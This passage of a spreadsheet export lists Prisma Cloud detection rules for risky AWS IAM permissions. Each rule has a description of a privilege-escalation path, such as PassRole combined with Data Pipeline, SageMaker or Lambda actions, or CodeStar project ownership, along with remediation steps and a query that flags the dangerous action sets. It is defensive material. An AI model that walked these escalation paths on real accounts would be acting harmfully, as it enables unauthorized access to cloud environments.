          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; Data Pipeline permissions</t>
        </is>
      </c>
      <c r="L3223" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3223" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3223" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3223" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3223" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3223" t="inlineStr"/>
      <c r="R3223" t="inlineStr"/>
      <c r="S3223" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3223" t="b">
        <v>1</v>
      </c>
      <c r="U3223" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3223" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3223" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole, datapipeline:ActivatePipeline, datapipeline:CreatePipeline, and datapipeline:PutPipelineDefinition permissions, an adversary can create a new pipeline and pass in a more privileged role. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3223" t="inlineStr">
        <is>
          <t>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22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3" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'datapipeline:ActivatePipeline', 'datapipeline:CreatePipeline', 'datapipeline:PutPipelineDefinition') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3223" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3223" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3223" t="inlineStr"/>
      <c r="AD3223" t="b">
        <v>1</v>
      </c>
      <c r="AE3223" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3223" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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3" t="inlineStr">
        <is>
          <t>e579aa99-1226-4e21-8030-b38d0c7f704a</t>
        </is>
      </c>
      <c r="AI3223" t="inlineStr">
        <is>
          <t>e579aa99-1226-4e21-8030-b38d0c7f704a</t>
        </is>
      </c>
      <c r="AJ3223" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3223" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3224">
      <c r="A3224" t="inlineStr"/>
      <c r="B3224" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3224" s="2" t="inlineStr"/>
      <c r="D3224" t="n">
        <v>0</v>
      </c>
      <c r="E3224" t="n">
        <v>121</v>
      </c>
      <c r="F3224" t="n">
        <v>0</v>
      </c>
      <c r="G3224" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3224" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3224" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; SageMaker create processing job permissions</t>
        </is>
      </c>
      <c r="L3224" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3224" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3224" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3224" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3224" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3224" t="inlineStr"/>
      <c r="R3224" t="inlineStr"/>
      <c r="S3224" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3224" t="b">
        <v>1</v>
      </c>
      <c r="U3224" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3224" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3224" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and sagemaker:CreateProcessingJob permissions, an adversary can start a processing job and pass a more privileged existing role to it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3224"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22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4" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'sagemaker:CreateProcessingJob' ) AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3224" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3224" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3224" t="inlineStr"/>
      <c r="AD3224" t="b">
        <v>1</v>
      </c>
      <c r="AE3224" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3224" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>9c36caff-cd53-4de7-810e-cc150906d910</t>
        </is>
      </c>
      <c r="AI3224" t="inlineStr">
        <is>
          <t>9c36caff-cd53-4de7-810e-cc150906d910</t>
        </is>
      </c>
      <c r="AJ3224" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3224" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3225">
      <c r="A3225" t="inlineStr"/>
      <c r="B3225" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3225" s="2" t="inlineStr"/>
      <c r="D3225" t="n">
        <v>0</v>
      </c>
      <c r="E3225" t="n">
        <v>167</v>
      </c>
      <c r="F3225" t="n">
        <v>0</v>
      </c>
      <c r="G3225" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3225" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3225" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via Codestar create project and associate team member permissions</t>
        </is>
      </c>
      <c r="L3225" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3225" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3225" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3225" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3225" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3225" t="inlineStr"/>
      <c r="R3225" t="inlineStr"/>
      <c r="S3225" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3225" t="b">
        <v>1</v>
      </c>
      <c r="U3225" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3225" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3225" t="inlineStr">
        <is>
          <t>With access to the codestar:CreateProject and codestar:AssociateTeamMember permissions, an adversary can create a new CodeStar project and associate themselves as an Owner of the project. This will attach a new policy to the user that provides access to a number of permissions for AWS services. This is most useful for further enumeration as it gives access to lambda:List*, iam:ListRoles, iam:ListUsers, and more.</t>
        </is>
      </c>
      <c r="X3225"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22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5" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'codestar:CreateProject', 'codestar:AssociateTeamMember' ) AND dest.cloud.wildcardscope = true</t>
        </is>
      </c>
      <c r="AA3225" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3225" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:36</t>
        </is>
      </c>
      <c r="AC3225" t="inlineStr"/>
      <c r="AD3225" t="b">
        <v>1</v>
      </c>
      <c r="AE3225" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3225" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>7a034f1e-bf01-4080-b9e1-9f1485b83508</t>
        </is>
      </c>
      <c r="AI3225" t="inlineStr">
        <is>
          <t>7a034f1e-bf01-4080-b9e1-9f1485b83508</t>
        </is>
      </c>
      <c r="AJ3225" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3225" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3226">
      <c r="A3226" t="inlineStr"/>
      <c r="B3226" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3226" s="2" t="inlineStr"/>
      <c r="D3226" t="inlineStr"/>
      <c r="E3226" t="inlineStr"/>
      <c r="F3226" t="inlineStr"/>
      <c r="G3226" t="b">
        <v>1</v>
      </c>
      <c r="H32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226" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3226" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3226" t="inlineStr">
        <is>
          <t>User with lateral movement to admin in another account through code execution on compute resources</t>
        </is>
      </c>
      <c r="L3226" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3226" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3226" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3226" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3226" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3226" t="inlineStr"/>
      <c r="R3226" t="inlineStr"/>
      <c r="S3226" t="inlineStr"/>
      <c r="T3226" t="b">
        <v>1</v>
      </c>
      <c r="U3226" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3226" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3226" t="inlineStr">
        <is>
          <t>Identifies users with permissions to execute code on privileged compute resources in another account. This allows the user to execute code using the compute resource's privileges within the second account. As such, a compromise of such a user could allow an adversary to escalate their privileges and further themselves within the environment, moving laterally between the first and second account, greatly increasing the potential blast radius.</t>
        </is>
      </c>
      <c r="X3226" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the user ("Source"), their permission grantor ("Granted By Entity") and their account ("Source Cloud Account"), the action which allows code execution ("Action"), the administrative compute resource ("Destination") and its account ("Destination Cloud Account").
In order to remove any administrative permissions and minimize the potential privilege escalation avenues, use the following remediation steps:
Browse to the permission grantor ("Granted By Entity") in the AWS Console for the first account. Select the 'Permissions' tab, and search for the action and scope we observed in the "investigate" page ("Action", "Destination").  If deemed unnecessary, remove the permissions by either editing the policy or replacing it (notice: editing a customer managed policy could affect other roles). In order to fully remediate the issue, actions must be taken in the destination account as well, such as editing the resource-based policy for a Lambda so it does not allow the user to perform actions on it. Lastly, review the permissions given to the compute resource ("Destination") in the second account and remove if deemed unnecessary.</t>
        </is>
      </c>
      <c r="Y322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6" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.type = 'User' AND action.name IN ( 'ec2:ModifyInstanceAttribute', 'ec2-instance-connect:SendSSHPublicKey', 'ec2-instance-connect:SendSerialConsoleSSHPublicKey', 'lambda:UpdateFunctionCode', 'lambda:UpdateFunctionConfiguration', 'lambda:AddPermission', 'glue:UpdateDevEndpoint'  ) AND dest.cloud.resource.type IN ( 'Instance', 'function', 'devendpoint') AND dest.cloud.resource.isadministrative = true AND dest.cloud.account != source.cloud.account</t>
        </is>
      </c>
      <c r="AA3226" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3226" t="inlineStr">
        <is>
          <t>2024-10-14 06:04:42</t>
        </is>
      </c>
      <c r="AC3226" t="inlineStr"/>
      <c r="AD3226" t="b">
        <v>1</v>
      </c>
      <c r="AE3226" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3226" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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226" t="inlineStr">
        <is>
          <t>212bf9b6-2f0d-488b-8fae-56d464f73b76</t>
        </is>
      </c>
      <c r="AI3226" t="inlineStr">
        <is>
          <t>212bf9b6-2f0d-488b-8fae-56d464f73b76</t>
        </is>
      </c>
      <c r="AJ3226" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3226" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3227">
      <c r="A3227" t="inlineStr"/>
      <c r="B3227" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3227" s="2" t="inlineStr"/>
      <c r="D3227" t="inlineStr"/>
      <c r="E3227" t="inlineStr"/>
      <c r="F3227" t="inlineStr"/>
      <c r="G3227" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3227" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3227" t="inlineStr">
        <is>
          <t>EC2 with IAM role attached has s3:GetObject and s3:ListBucket permissions</t>
        </is>
      </c>
      <c r="L3227" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3227" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3227" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3227" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3227" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3227" t="inlineStr"/>
      <c r="R3227" t="inlineStr"/>
      <c r="S3227" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3227" t="b">
        <v>1</v>
      </c>
      <c r="U3227" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3227" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3227" t="inlineStr">
        <is>
          <t>This policies identifies EC2 instances with access to S3</t>
        </is>
      </c>
      <c r="X3227"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2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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('s3:ListBucket', 's3:GetObject') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3227" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3227" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3227" t="inlineStr"/>
      <c r="AD3227" t="b">
        <v>1</v>
      </c>
      <c r="AE3227" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3227" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>2fc55bb9-022e-4f6f-89b5-59f74f9f300a</t>
        </is>
      </c>
      <c r="AI3227" t="inlineStr">
        <is>
          <t>2fc55bb9-022e-4f6f-89b5-59f74f9f300a</t>
        </is>
      </c>
      <c r="AJ3227" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3227" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3228">
      <c r="A3228" t="inlineStr"/>
      <c r="B3228" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3228" s="2" t="inlineStr"/>
      <c r="D3228" t="inlineStr"/>
      <c r="E3228" t="inlineStr"/>
      <c r="F3228" t="inlineStr"/>
      <c r="G3228" t="b">
        <v>1</v>
      </c>
      <c r="H32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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3228" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3228" t="inlineStr">
        <is>
          <t>AWS EC2 with IAM role with alter critical configuration for s3 permissions</t>
        </is>
      </c>
      <c r="L3228" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3228" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3228" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3228" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3228" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3228" t="inlineStr"/>
      <c r="R3228" t="inlineStr"/>
      <c r="S3228" t="inlineStr"/>
      <c r="T3228" t="b">
        <v>1</v>
      </c>
      <c r="U3228" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3228" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3228" t="inlineStr">
        <is>
          <t>This IAM policy instates precise oversight over essential operations within AWS, with a specific focus on 'instance' resources. By thoughtfully managing the capability to influence s3 bucket attributes, such as configuring retention, lifecycle, policy, and versioning settings, this policy plays a crucial role in averting potential hazards. It ensures that unauthorized modifications, which could lead to public exposure or data loss, are effectively mitigated, contributing to the overall resilience of your cloud environment.</t>
        </is>
      </c>
      <c r="X3228"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2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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('s3:PutObjectRetention','s3:PutLifecycleConfiguration','s3:PutBucketPolicy','s3:PutBucketVersioning') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3228" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3228" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3228" t="inlineStr"/>
      <c r="AD3228" t="b">
        <v>1</v>
      </c>
      <c r="AE3228" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3228" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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8" t="inlineStr">
        <is>
          <t>4ee8ce9b-6f74-4ccd-8a5f-abc2e2db0ea7</t>
        </is>
      </c>
      <c r="AI3228" t="inlineStr">
        <is>
          <t>4ee8ce9b-6f74-4ccd-8a5f-abc2e2db0ea7</t>
        </is>
      </c>
      <c r="AJ3228" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3228" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3229">
      <c r="A3229" t="inlineStr"/>
      <c r="B3229" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3229" s="2" t="inlineStr"/>
      <c r="D3229" t="n">
        <v>5</v>
      </c>
      <c r="E3229" t="n">
        <v>44</v>
      </c>
      <c r="F3229" t="n">
        <v>0</v>
      </c>
      <c r="G3229" t="b">
        <v>1</v>
      </c>
      <c r="H32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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3229" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3229" t="inlineStr">
        <is>
          <t>AWS Lambda Function with IAM policy management permissions</t>
        </is>
      </c>
      <c r="L3229" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3229" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3229" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3229" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3229" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3229" t="inlineStr"/>
      <c r="R3229" t="inlineStr"/>
      <c r="S3229" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3229" t="b">
        <v>1</v>
      </c>
      <c r="U3229" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3229" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3229" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow Lambda functions to manage IAM policies, such as creating, deleting, or attaching IAM policies to identities, roles, or groups.  IAM policy management permissions are very risky and should only be used under very strict controls.  Unnecessary usage of these permissions can significantly increase your attack surface and make it easier for attackers to compromise your AWS environment.</t>
        </is>
      </c>
      <c r="X3229" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the Lambda Function 
3. Find the role used by the Lambda Function
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y322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29" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('iam:AttachGroupPolicy','iam:AttachRolePolicy','iam:AttachUserPolicy','iam:CreatePolicy','iam:CreatePolicyVersion','iam:DeleteAccountPasswordPolicy','iam:DeleteGroupPolicy','iam:DeletePolicy','iam:DeletePolicyVersion','iam:DeleteRolePermissionsBoundary','iam:DeleteRolePolicy','iam:DeleteUserPermissionsBoundary','iam:DeleteUserPolicy','iam:DetachGroupPolicy','iam:DetachRolePolicy','iam:DetachUserPolicy','iam:PutGroupPolicy','iam:PutRolePermissionsBoundary','iam:PutRolePolicy','iam:PutUserPermissionsBoundary','iam:PutUserPolicy','iam:SetDefaultPolicyVersion','iam:UpdateAssumeRolePolicy') AND source.cloud.service.name = 'lambda' AND source.cloud.resource.type = 'function'</t>
        </is>
      </c>
      <c r="AA3229" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3229" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3229" t="inlineStr"/>
      <c r="AD3229" t="b">
        <v>1</v>
      </c>
      <c r="AE3229" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3229" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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29" t="inlineStr">
        <is>
          <t>4810bdba-6daa-4297-8bca-990eb7ea77b0</t>
        </is>
      </c>
      <c r="AI3229" t="inlineStr">
        <is>
          <t>4810bdba-6daa-4297-8bca-990eb7ea77b0</t>
        </is>
      </c>
      <c r="AJ3229" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3229" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3230">
      <c r="A3230" t="inlineStr"/>
      <c r="B3230" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3230" s="2" t="inlineStr"/>
      <c r="D3230" t="n">
        <v>0</v>
      </c>
      <c r="E3230" t="n">
        <v>9</v>
      </c>
      <c r="F3230" t="n">
        <v>0</v>
      </c>
      <c r="G3230" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3230" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3230" t="inlineStr">
        <is>
          <t>AWS EC2 machine with write access permission to resource-based policies</t>
        </is>
      </c>
      <c r="L3230" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3230" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3230" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3230" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3230" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3230" t="inlineStr"/>
      <c r="R3230" t="inlineStr"/>
      <c r="S3230" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3230" t="b">
        <v>1</v>
      </c>
      <c r="U3230" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3230" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3230" t="inlineStr">
        <is>
          <t>This IAM policy identifies ec2 instance with permissions contol resource based policies for different AWS services. They enable setting policies and permissions for repositories, applications, backup vaults, file systems, data stores, and more. While these permissions offer operational flexibility, it is crucial to use them responsibly. Mishandling these permissions may result in unauthorized access, misconfigurations, or data exposure. It is recommended to assign and manage these permissions to trusted individuals to maintain security posture for AWS resources.</t>
        </is>
      </c>
      <c r="X3230"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3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30" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('ecr:SetRepositoryPolicy','serverlessrepo:PutApplicationPolicy','backup:PutBackupVaultAccessPolicy','efs:PutFileSystemPolicy','glacier:SetVaultAccessPolicy','secretsmanager:PutResourcePolicy','events:PutPermission','mediastore:PutContainerPolicy','glue:PutResourcePolicy','ses:PutIdentityPolicy','lambda:AddPermission','lambda:AddLayerVersionPermission','s3:PutBucketPolicy','s3:PutBucketAcl','s3:PutObject','s3:PutObjectAcl','kms:CreateGrant','kms:PutKeyPolicy','es:UpdateElasticsearchDomainConfig','sns:AddPermission','sqs:AddPermission') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3230" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3230" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3230" t="inlineStr"/>
      <c r="AD3230" t="b">
        <v>1</v>
      </c>
      <c r="AE3230" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3230" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>11ada836-c9b3-488c-809d-826c41a74a83</t>
        </is>
      </c>
      <c r="AI3230" t="inlineStr">
        <is>
          <t>11ada836-c9b3-488c-809d-826c41a74a83</t>
        </is>
      </c>
      <c r="AJ3230" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3230" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3231">
      <c r="A3231" t="inlineStr"/>
      <c r="B3231" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3231" s="2" t="inlineStr"/>
      <c r="D3231" t="inlineStr"/>
      <c r="E3231" t="inlineStr"/>
      <c r="F3231" t="inlineStr"/>
      <c r="G3231" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3231" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3231" t="inlineStr">
        <is>
          <t>AWS role having iam:PassRole and lambda:InvokeFunction permissions attached to EC2 instance</t>
        </is>
      </c>
      <c r="L3231" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3231" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3231" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3231" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3231" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3231" t="inlineStr"/>
      <c r="R3231" t="inlineStr"/>
      <c r="S3231" t="inlineStr"/>
      <c r="T3231" t="b">
        <v>1</v>
      </c>
      <c r="U3231" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3231" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3231" t="inlineStr">
        <is>
          <t>This IAM policy is meticulously designed to address potential vulnerabilities arising from an AWS EC2 instance with specific permissions. The 'iam:PassRole' action, coupled with 'lambda:CreateFunction' and 'lambda:InvokeFunction', holds the potential for adversaries to exploit and escalate privileges. By strategically controlling access to these actions within the 'ec2' service, this policy effectively mitigates the risk of unauthorized creation and manipulation of Lambda functions, safeguarding against potential escalation of privileges and maintaining the integrity of your system.</t>
        </is>
      </c>
      <c r="X3231" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the EC2 instance
3. Find the role used by the EC2 instance
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y323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31" t="inlineStr">
        <is>
